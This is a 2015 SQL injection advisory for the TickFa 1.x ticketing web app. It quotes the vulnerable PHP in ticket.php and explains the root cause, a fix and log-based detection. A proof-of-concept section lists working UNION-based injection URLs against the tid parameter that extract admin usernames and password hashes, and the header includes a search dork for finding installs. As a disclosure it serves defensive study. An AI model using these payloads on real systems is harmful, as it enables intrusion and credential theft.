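/*
#[+] Author: Mohammad Reza Espargham
#[+] Title: TickFa 1.x - SQL Injection Vulnerability
#[+] Date: 26-04-2015
#[+] Vendor: http://tickfa.aftab.cc/
#[+] SoftWare Link : http://tickfa.aftab.cc/dl/tickfa.zip
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian) / curl 7.35.0
#[+] GHDB : intext:"تیکت برای بخش مورد نظر ایجاد نمایید" dash>
*/

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
ticket.php Source

$tid = $_REQUEST['tid'];
$userid = $_SESSION['userid'];
....
....
$reply = mysql_query("SELECT * FROM `".$dbprefix."answers` WHERE tid='$tid' order by date");
while($reply_row=mysql_fetch_array($reply)) {
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Root cause: $tid is taken straight from $_REQUEST['tid'] and interpolated into the SELECT string passed to mysql_query() with no type check, escaping or parameter binding, so the request parameter becomes part of the SQL statement.
Fix: treat tid as the integer it is (for example $tid = (int) $_REQUEST['tid'];) and run the query as a prepared statement with a bound parameter via mysqli or PDO; the mysql_* extension used here was removed in PHP 7.0.
The query as shown filters on tid only and not on $userid; the elided lines may contain an ownership check, but if they do not, any logged-in user can read another user's ticket replies, which is a separate access-control issue to verify.
Detection: look in web server logs for requests to ticket.php whose tid value is not purely numeric. If such requests are found on an unpatched install, assume the admins table was readable and rotate the admin credentials.

////////////////
/// POC ////
///////////////

1. You must register on the website at this link
http://site.com/register.php

2. You must log in to the website

3. Send a ticket

4. Your vulnerable link
http://site.com/ticket.php?action=read&tid={Ticket ID}

http://site.com/ticket.php?action=read&tid=65'

http://site.com/ticket.php?action=read&tid=65 union select 3,4,5,6,7,8,9,10,CONCAT_WS(CHAR(59),version(),current_user(),database()) from [profix]_admins

http://site.com/ticket.php?action=read&tid=65 union select 1,2,3,4,5,6,7,8,9,10,group_concat(apass,0x23,auname) from [profix]_admins

5.END <3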